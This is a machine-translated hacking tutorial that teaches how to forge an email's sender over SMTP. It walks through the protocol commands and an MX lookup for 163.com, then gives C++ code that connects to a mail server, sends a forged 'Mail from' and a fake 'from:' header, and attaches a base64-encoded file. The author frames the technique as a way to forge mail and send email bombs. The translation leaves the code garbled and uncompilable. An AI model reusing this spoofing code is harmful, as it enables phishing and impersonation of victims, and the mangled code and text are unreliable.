SMTP Electronic Post and Telecommunications Technology Unveiled Author: LionD8 SMTP is also a simple mail transfer protocol. We usually use this protocol to transmit, and email is often used by hackers to use some attacks, such as forgery, or attack mail servers. Email bomb, in everyone Have you ever thought about the inside story with these black soft? Now I have a simple to introduce the techniques and specific implementation methods of email using a piece of brick jade. One. First we must briefly introduce the SMTP mail protocol. The SMTP service defaults to the open 25 port, and we use 163 mail servers as an example to perform email forgery implementation. 1. First send an email must be connected to the mail server, and then send the helo command and the server to greet. Command format Helo 2. Then we should send any emails that are sent, such as: mailfrom: hacker@hacker.com forgery. If success, 250 will be returned. 3. Then we want the mail server to know, we want to send an email. Send command: rcpt to: xiaoji198288@163.com xiaoji198288@163.com for our recipient's address. We will use this address to be tested. 4. After the recipient is determined, we should send the data of the text of the email. Send a command: DATA. Then it is to send our email. Finally send 5. Finally we send a command: quit. Disconnect and email servers. It's ending here. Maybe you still feel that the above process is more void, there is no relationship we will use the code to confirm each of the processes above. II. Code and annotation section. First we define a CMAIL class. Class cemail { PUBLIC: Void CBase64Encode (Char * PSR, Char * PDES, INT NSOURLEN); // base64 encoding is used to send attachments. Void sender (); // Send an email CString M_FileName; / / As an attachment file name CSTRING M_MAILDES; / / Recipient Tank CString M_Serverip; // MX records IP, we trials 163 MX records, and we will introduce the Query method of the MX record IP. Socket m_sock; // a set of wires CEMAIL (CSTRING FileName, CString Sip = "", CString DES = ""); // Constructor Virtual ~ cemail (); } Below we briefly introduce the Query method of the MX mail server and base64 encoding. MX Record Query: Enter nslookup -Qt = mx 163.com Enter the CMD. The IP recorded by MX is similar to the following return results: G: /> nslookup -qt = mx 163.com *** CAN't Find Server Name for Address 211.158.22.118: No Response from Server Server: DNS.CTA.NET.CN Address: 61.128.128.68 Non-Authoritative Answer: 163.com MX preference = 50, mail exchanger = m203.163.com 163.com MX preference = 50, mail exchanger = m209.163.com163.com mx preference = 50, mail exchanger = m210.163.com 163.com Nameserver = ns.nese.net 163.com Nameserver = ns2.nease.net M209.163.com Internet address = 202.108.44.209 M210.163.com Internet address = 202.108.44.210 M203.163.com Internet address = 202.108.44.203 202.108.44.203 202.108.44.209 202.108.44.210 are all MX mail server IP We selected the first 202.108.44.203 as a test object. Base64 encoding: Since SMTP is limited to 7 bits of ASCII code, MIME has appeared because of the use of email. MIME did not change SMTP, but only expanded it in accordance with SMTP rules, including mail head, and non-ASCII code encoding rules, the most widely used is Base64 encoding. Since the attachment is not necessarily a plain text format, most of them are flow files, 2 credits. So the 2 credit file is encoded. First, 24-bit (3 bytes) data are divided into 4 6-bit groups. 64 values, corresponding A - ZA - Z0 - 9 / Use == and = respectively indicate that the last set of data is only 8 or 16 bits. For example, 01001001 00110001 01111001 corresponds to: 010010 010011 000101 111001. Base64 encoding: STE5. Basic introduction is over, the following is the main part of sending mail. Cemail :: Cemail (CString FileName, CString Sip, CString DES) { m_filename = filename; m_serverip = SIP; M_maildes = des; m_sock = NULL; } // Conformi-constructor initialization // Send body function Void Cemail :: Sender () { IF ((M_Sock = Socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) == Invalid_socket) { AfxMessageBox ("M_Sock False"); Exit (1); } // TCP set SockAddr_in addr_in = {0}; Char * PBUF = NULL; PBUF = m_filename.getBuffer (m_filename.getlength ()); // Get the file name and convert to a char *. Char * next = 0; While (next = strstr (pbuf, "//")))) PBUF = next 1; // Get the first letter of the file Addr_in.sin_family = af_INet; Addr_in.sin_port = htons (25); Addr_in.sin_addr.s_un.s_addr = inet_addr (m_serverip); // MX Mail Record IP While (1) { INT RET = Connect (m_sock, (struct socddr *) & addr_in, sizeof (addr_in)); IF (RET! = Socket_ERROR) BREAK; Sleep (1000); } // Connect the remote server. If you succeed, you jump out of the dead cycle. Char * ptstring = "HELO ROOT / R / N"; Char BUF [256] = {0}; Send (M_Sock, PTString, Strlen (PTString), 0); // Send Helo Command Sleep (1000); RECV (M_Sock, BUF, 256, 0); // Receive the return information MEMSET (BUF, 0, 256); CString TMP = "" TMP = "Mail from: liond8@cqsn.com/r/n"; Send (M_Sock, TMP, Tmp.getLength (), 0); // Send a mail from command RECV (M_SOCK, BUF, 256, 0); MEMSET (BUF, 0, 256); TMP = "RCPT TO:" m_maildes "/ r / n"; Send (M_Sock, TMP, Tmp.getLength (), 0); // Send RCPT TO command RECV (M_SOCK, BUF, 256, 0); MEMSET (BUF, 0, 256); TMP = "DATA / R / N"; Send (M_Sock, TMP, Tmp.getLength (), 0); // Send DATA command RECV (M_SOCK, BUF, 256, 0); MEMSET (BUF, 0, 256); // mime head TMP = "SUBJECT:" TMP = m_title; TMP = "/ n"; // message theme Send (M_Sock, TMP, Tmp.getLength (), 0); TMP = "from:" m_sendername "/ n"; // We fake sender Send (M_Sock, TMP, Tmp.getLength (), 0); TMP = "TO:" m_maildes "/ r / n"; // Recipient Send (M_Sock, TMP, Tmp.getLength (), 0); TMP = "Content-Type: Multipart / Mix; Boundary = QWERTYUIOP / R / N"; / / Define the segmentation of the flag to qwertyuiop. Send (M_Sock, TMP, Tmp.getLength (), 0); TMP = "/ n - qWERTYUIOP / N / N"; Send (M_Sock, TMP, Tmp.getLength (), 0); M_StringText = "/ n"; Send (m_sock, m_stringtext, m_stringText.getLength (), 0); // Send text content void * basepointer; TMP = "--qwertyuiop / n"; Send (M_Sock, TMP, Tmp.getLength (), 0); TMP = "Content-Type: Application / OCTET-STREAM; Name ="; TMP = PBUF; TMP = "/ n"; Send (M_Sock, TMP, Tmp.getLength (), 0); TMP = "Content-Transfer-Encoding: Base64 / R / N"; // Using Base64 encoding Send (M_Sock, TMP, Tmp.getLength (), 0); TMP = "Content-Disposition: attachment; filename =" TMP = PBUF; TMP = "/ n / n"; Send (M_Sock, TMP, Tmp.getLength (), 0); Handle hfile, hmapping; IF ((HFile = Createfile (m_filename, generic_read, file_share_read, 0, open_existing, file_flag_sequential_scan, 0) == Invalid_Handle_Value) { AfxMessageBox ("Could Not Open File"); Return; } //open a file. IF (! (hmapping = createfilemapping (hfile, 0, page_readonly | sec_commit, 0, 0, 0)))) { AfxMessageBox ("mapping failed"); CloseHandle (HFILE); Return; } IF (! (Basepointer = MapViewoffile (hmapping, file_map_read, 0, 0, 0)))))) { AfxMessageBox ("View Failed"); CloseHandle (hmapping); CloseHandle (HFILE); Return; } // map the file to memory. DWORD CB = getFileSize (Hfile, Null); // Get file size Char * t = (char *) Malloc ((CB / 3) * 4 4); // Assign Base64 encoded memory MEMSET (T, 0, (CB / 3) * 4 4); CBase64Encode ((char *) Basepointer, T, CB); // Code Send (M_Sock, (Char *) T, (CB / 3) * 4 4, 0); // Send the encoded file TMP = "/ N / N / N - QWERTYUIOP - / N / N"; Send (M_Sock, TMP, Tmp.getLength (), 0); UNMAPVIEWOFFILE (BASEPOINTER); CloseHandle (hmapping); CloseHandle (HFILE); TMP = "/n/r/n./r/N"; // body transfer ends Send (M_Sock, TMP, Tmp.getLength (), 0); RECV (M_SOCK, BUF, 256, 0); Send (m_sock, "quit / n", 5, 0); AfxMessageBox ("Mail Send"); CloseSocket (M_SOCK); }
